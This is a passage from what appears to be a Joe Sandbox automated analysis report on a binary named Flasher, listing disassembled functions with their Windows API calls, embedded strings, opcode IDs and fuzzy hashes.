                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove
                                                                      • String ID: assertion failed: match_dist >= 1$assertion failed: match_dist as usize <= LZ_DICT_SIZE$assertion failed: match_len >= MIN_MATCH_LEN.into()
                                                                      • API String ID: 2162964266-4225841344
                                                                      • Opcode ID: 1c287cb6dd19af40e3e66bee8495ca75f5682818547e9ee08ccface2cc130530
                                                                      • Instruction ID: f3916923899b8551d24039cdf043f7d950d41ae5ce4089de171fc44d2d4f0bd0
                                                                      • Opcode Fuzzy Hash: 1c287cb6dd19af40e3e66bee8495ca75f5682818547e9ee08ccface2cc130530
                                                                      • Instruction Fuzzy Hash: 6091A3A2A09A9681EA158F15D5423ECA760FB08BD0F448633DA8DA3B91DF7CE5F1C314
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$CreateErrorLastThread
                                                                      • String ID:
                                                                      • API String ID: 1443094557-0
                                                                      • Opcode ID: ca5f7bfc4cfebd7b3c28d010939ad3fc9d2bf17995f1f2014006c66ef40a942b
                                                                      • Instruction ID: dd6b3663e3c12d8ba807120e4b0a41d44ce806fe6413997503c1ff02d1038b39
                                                                      • Opcode Fuzzy Hash: ca5f7bfc4cfebd7b3c28d010939ad3fc9d2bf17995f1f2014006c66ef40a942b
                                                                      • Instruction Fuzzy Hash: 6D318732B05B4585F7509B61E8023BDA7A1FB88B94F048536DE6CA7798DF3CD592C350
                                                                      APIs
                                                                        • Part of subcall function 00007FF6D35DA120: HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,?,?,00007FF6D35D9B12), ref: 00007FF6D35DA268
                                                                      • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D34F556D), ref: 00007FF6D35DE94B
                                                                      • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D34F556D), ref: 00007FF6D35DE966
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D34F556D), ref: 00007FF6D35DE970
                                                                      • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D34F556D), ref: 00007FF6D35DE991
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3527042468-0
                                                                      • Opcode ID: 6b645e2686f54b7b6b4263a4aef53a7db2a4a91820fad35115efc9f51e4507c6
                                                                      • Instruction ID: 9f563bb7f897d32b2822361e80140bac0db97b4398e33a1257550f43f539ba8b
                                                                      • Opcode Fuzzy Hash: 6b645e2686f54b7b6b4263a4aef53a7db2a4a91820fad35115efc9f51e4507c6
                                                                      • Instruction Fuzzy Hash: 12117865F05A1A84FB40D772E9421BDA7706F88FC4B580532CE5EB7B98DE2CD4628310
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _cwprintf_s_l
                                                                      • String ID: %s in "%s"$unrecognized token: "%T"
                                                                      • API String ID: 2941638530-735598712
                                                                      • Opcode ID: aba622d79f1eb66d26282a16f22a3daa9ebd9c1fedf2e223890e2409bb943c22
                                                                      • Instruction ID: efb715a45b6f6ab4d4483f30d94d3fe777058cb61b6a61f63cc45dddd8fe8550
                                                                      • Opcode Fuzzy Hash: aba622d79f1eb66d26282a16f22a3daa9ebd9c1fedf2e223890e2409bb943c22
                                                                      • Instruction Fuzzy Hash: 16A1A233A08B8682EB24DB26D4422BEF3A1FB84794F144133DA8DA7695DF3DE561C744
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove$FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3670176668-0
                                                                      • Opcode ID: c63524673e6e08f0d75c82cabf1d20c17ff4a4f0ec80246f6fd7203d0ac20dc6
                                                                      • Instruction ID: 475ef1ccfeb190eaf9d3685361656f075addd5c6ecae2ff5e8fdd23f8919e4be
                                                                      • Opcode Fuzzy Hash: c63524673e6e08f0d75c82cabf1d20c17ff4a4f0ec80246f6fd7203d0ac20dc6
                                                                      • Instruction Fuzzy Hash: 5BA1E922A08B8681E7209B66E4023BEF3A0FB94784F544537DE8DA7795DF3CE5A5C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$memmove
                                                                      • String ID:
                                                                      • API String ID: 2650465384-0
                                                                      • Opcode ID: 69e7b757fb245ff3543c92cc3d8c2f205d165c2342aa89a7f348f57fc5c92771
                                                                      • Instruction ID: 29491cbc22ffec18d84821022a465ea5de0a3628a29b52f3fe8737a9b53895ce
                                                                      • Opcode Fuzzy Hash: 69e7b757fb245ff3543c92cc3d8c2f205d165c2342aa89a7f348f57fc5c92771
                                                                      • Instruction Fuzzy Hash: 5DC1BC3AA08AC588E7719F25DC413ED67A0FB46B88F044136EA0D9FB89CF399756C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: gfff
                                                                      • API String ID: 2221118986-1553575800
                                                                      • Opcode ID: 3f1b2de389e37dfa457b3d776674aac8e4d695f04a0cc4059d0f3fb95358f356
                                                                      • Instruction ID: db3b9b3e575a6ddb4c9840267ffeabc28031d6b00e6513ea3f033dbbda2f3594
                                                                      • Opcode Fuzzy Hash: 3f1b2de389e37dfa457b3d776674aac8e4d695f04a0cc4059d0f3fb95358f356
                                                                      • Instruction Fuzzy Hash: A9B11B32E1EE4386FB549B15AC6367CA7A0BF44784F40113BD41DE66A5DE6CF8219B0C
                                                                      APIs
                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000001,MATCH,00000000,00000000,00007FF6D368D751), ref: 00007FF6D36DDC9B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: strlen
                                                                      • String ID: MATCH$unable to delete/modify user-function due to active statements
                                                                      • API String ID: 39653677-3401026049
                                                                      • Opcode ID: 42d493848d45331dffd31dbfab914d2d29802044157e74944a43220535450a6c
                                                                      • Instruction ID: a7c67c6dadf337fdc40e69358a7a0b9a18792e17eb5cd550e17516bb83cd82bc
                                                                      • Opcode Fuzzy Hash: 42d493848d45331dffd31dbfab914d2d29802044157e74944a43220535450a6c
                                                                      • Instruction Fuzzy Hash: 4281C33260ABC182EB74AF25B54176EB6A4FF94B84F244136DE8CA7B58DF3CD4619700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastgetaddrinfomemmove
                                                                      • String ID:
                                                                      • API String ID: 1338285005-0
                                                                      • Opcode ID: f7cba9aa90f5d75a81ecbafa18ff51224466b3f37be874a4fe02cf2bf3ef1eb6
                                                                      • Instruction ID: 0866d24165be02193bdf5c0b6de422e49bbcc36d6dd1cefc29d9302cad007e40
                                                                      • Opcode Fuzzy Hash: f7cba9aa90f5d75a81ecbafa18ff51224466b3f37be874a4fe02cf2bf3ef1eb6
                                                                      • Instruction Fuzzy Hash: F851A162A08BC984E7658F65D9053FDA7A1EB44794F448232CA9DF77C4EF3C96A9C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$QueryValue
                                                                      • String ID:
                                                                      • API String ID: 4159883869-0
                                                                      • Opcode ID: c6f0ff6ee241f5948628bef094a5c3d6ebc70b2c40a6cf4d0c85013a12592aba
                                                                      • Instruction ID: ebe3791830e30d9e2c23a878f4e27bcfce10123ee422ea338da7d1fb498924f0
                                                                      • Opcode Fuzzy Hash: c6f0ff6ee241f5948628bef094a5c3d6ebc70b2c40a6cf4d0c85013a12592aba
                                                                      • Instruction Fuzzy Hash: 1D41A232A19B8582EB409B11F44636EF760FB85B88F145436EE8D97B88CF7DD4A5CB40
                                                                      APIs
                                                                        • Part of subcall function 00007FF6D35DA120: HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,?,?,00007FF6D35D9B12), ref: 00007FF6D35DA268
                                                                      • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D35EA701
                                                                      • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D35EA714
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6D35EA73C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3036504266-0
                                                                      • Opcode ID: 0f5f23d987d33acb77ab3b0b71267dd83d0e83218b2d9abce1026c7decf16c21
                                                                      • Instruction ID: 49213e5d93e622fba707062ab86bc83eaefd0da4c8a5b5f1c87ce1802e5c77c7
                                                                      • Opcode Fuzzy Hash: 0f5f23d987d33acb77ab3b0b71267dd83d0e83218b2d9abce1026c7decf16c21
                                                                      • Instruction Fuzzy Hash: EF414A32A05F4688EB50CF65E8413ACA3B4BB487A4F144136CE6DA7B98DF39D0A1C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: b5273e670981800afd9f88ae5754811464409107fdb57b7d1da2cb08936055dc
                                                                      • Instruction ID: 065b9af916cda9c823ddf44436a67991bf41e875372da2e67fae089080641da3
                                                                      • Opcode Fuzzy Hash: b5273e670981800afd9f88ae5754811464409107fdb57b7d1da2cb08936055dc
                                                                      • Instruction Fuzzy Hash: 38016221D0994682E764AB22E4463BEB361FF88744F444033C64EE66A4CF3CF4A6C344
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeapmemcmp
                                                                      • String ID:
                                                                      • API String ID: 2929263700-0
                                                                      • Opcode ID: 8456d2698544595e5ec8b2e24706bebeffe83d47eee8970aeac385fcece02df2
                                                                      • Instruction ID: 5a40c9b4ed87170aa15d483ffb3b74bd018faaac3575b9fbe655a0538d5b8965
                                                                      • Opcode Fuzzy Hash: 8456d2698544595e5ec8b2e24706bebeffe83d47eee8970aeac385fcece02df2
                                                                      • Instruction Fuzzy Hash: 6651B422A18B8581E6218B16E4413AEF364FB89BD4F485237EE8DA3B94DF3CD591C700
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 238e05d4d0be44c1557c8a40a5e45a6591c621f8938cdd96383396b61838066d
                                                                      • Instruction ID: 0a28fec37f167c9ff0af3b587d2b8f0560957da3d2bffdb2161e9ecc2f8a46da
                                                                      • Opcode Fuzzy Hash: 238e05d4d0be44c1557c8a40a5e45a6591c621f8938cdd96383396b61838066d
                                                                      • Instruction Fuzzy Hash: 9141D862F19A4985F704CB65A8063AC9760BF84B98F148537CE1CB7794DF3CD496C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileObjectReadSingleWaitmemmove
                                                                      • String ID:
                                                                      • API String ID: 794704148-0
                                                                      • Opcode ID: 6f376b4c74c12a602ef57226442ccb49b1f100bd83c0fee0b054d20d9a06625a
                                                                      • Instruction ID: c83cb4933167cdffddc8fd55b38bf32d0278c8a9e7c98c457a4fec9ff69f954e
                                                                      • Opcode Fuzzy Hash: 6f376b4c74c12a602ef57226442ccb49b1f100bd83c0fee0b054d20d9a06625a
                                                                      • Instruction Fuzzy Hash: D031D322B05A45C5EA14CB66ED066ACA761FF84BE4F188533DE1DA3B94DF3CE092C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileObjectReadSingleWaitmemmove
                                                                      • String ID:
                                                                      • API String ID: 794704148-0
                                                                      • Opcode ID: d0d3949f83f4eded4874991e53e3d80ae87d59719e39a471d29c50b576c27c93
                                                                      • Instruction ID: dbc85ead9e64dc7a61c35152ef1c8e23c2a2322f529e972247fe865ba3ba5c33
                                                                      • Opcode Fuzzy Hash: d0d3949f83f4eded4874991e53e3d80ae87d59719e39a471d29c50b576c27c93
                                                                      • Instruction Fuzzy Hash: 5F31D122B44A55C5EA14CB66E9063ACA731BB88BE4F588533DE5DA7B94DF3CD092C300
                                                                      APIs
                                                                      • memmove.VCRUNTIME140(?,?,?,?,00007FF6D3579585,?,?,?,?,?,00007FF6D357965E), ref: 00007FF6D3579490
                                                                      • memmove.VCRUNTIME140(?,?,?,?,00007FF6D3579585,?,?,?,?,?,00007FF6D357965E), ref: 00007FF6D35794B6
                                                                      • memmove.VCRUNTIME140(?,?,?,?,00007FF6D3579585,?,?,?,?,?,00007FF6D357965E), ref: 00007FF6D35794D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove
                                                                      • String ID:
                                                                      • API String ID: 2162964266-0
                                                                      • Opcode ID: 99260a4ac43c5302e530d71ea301cdc612e686f0c1fbed2658aebd7af000aad1
                                                                      • Instruction ID: 0b8529d95357c49d31c654363edbf215333bb7f492545f617de5d5c0bfdf8af2
                                                                      • Opcode Fuzzy Hash: 99260a4ac43c5302e530d71ea301cdc612e686f0c1fbed2658aebd7af000aad1
                                                                      • Instruction Fuzzy Hash: 9221A4A2A04A4542EA349B22E9557ADE761BF06BD0F048437CE6E67FA1DE3CE0529304
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$memmove
                                                                      • String ID:
                                                                      • API String ID: 2650465384-0
                                                                      • Opcode ID: 179d5a11e961b4867e1020b02792c61203af529cf97795a71329f0e9d9343d39
                                                                      • Instruction ID: 1cdac7b80f8eb8cc7e0c4137c90e88a16813e834761b87be310be25401239336
                                                                      • Opcode Fuzzy Hash: 179d5a11e961b4867e1020b02792c61203af529cf97795a71329f0e9d9343d39
                                                                      • Instruction Fuzzy Hash: 30212C30E4D98A80E975AB1294562BDE390AF95780F484437D84EF7B99CF7CE8A1D704
                                                                      APIs
                                                                      • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF6D3733A99
                                                                        • Part of subcall function 00007FF6D35028C1: memmove.VCRUNTIME140(?,?,?,00000000,00007FF6D3733F88), ref: 00007FF6D350292F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmovememset
                                                                      • String ID: 0
                                                                      • API String ID: 1288253900-4108050209
                                                                      • Opcode ID: 0373d1ec85dc086fe9c27896b2e0ffea76234fdf356b3906c0880a7418990436
                                                                      • Instruction ID: 20e78dd6016ca4bf0e8caddd37e4336c86e9b389b45840eed1aaaf663ce42511
                                                                      • Opcode Fuzzy Hash: 0373d1ec85dc086fe9c27896b2e0ffea76234fdf356b3906c0880a7418990436
                                                                      • Instruction Fuzzy Hash: 6E71E563A18F8982EA24CB19E5012ADA760F754B94F445736DFAE637E5EF3CD065C300
                                                                      APIs
                                                                      • GetFileInformationByHandleEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6D35DF904), ref: 00007FF6D35DC0A3
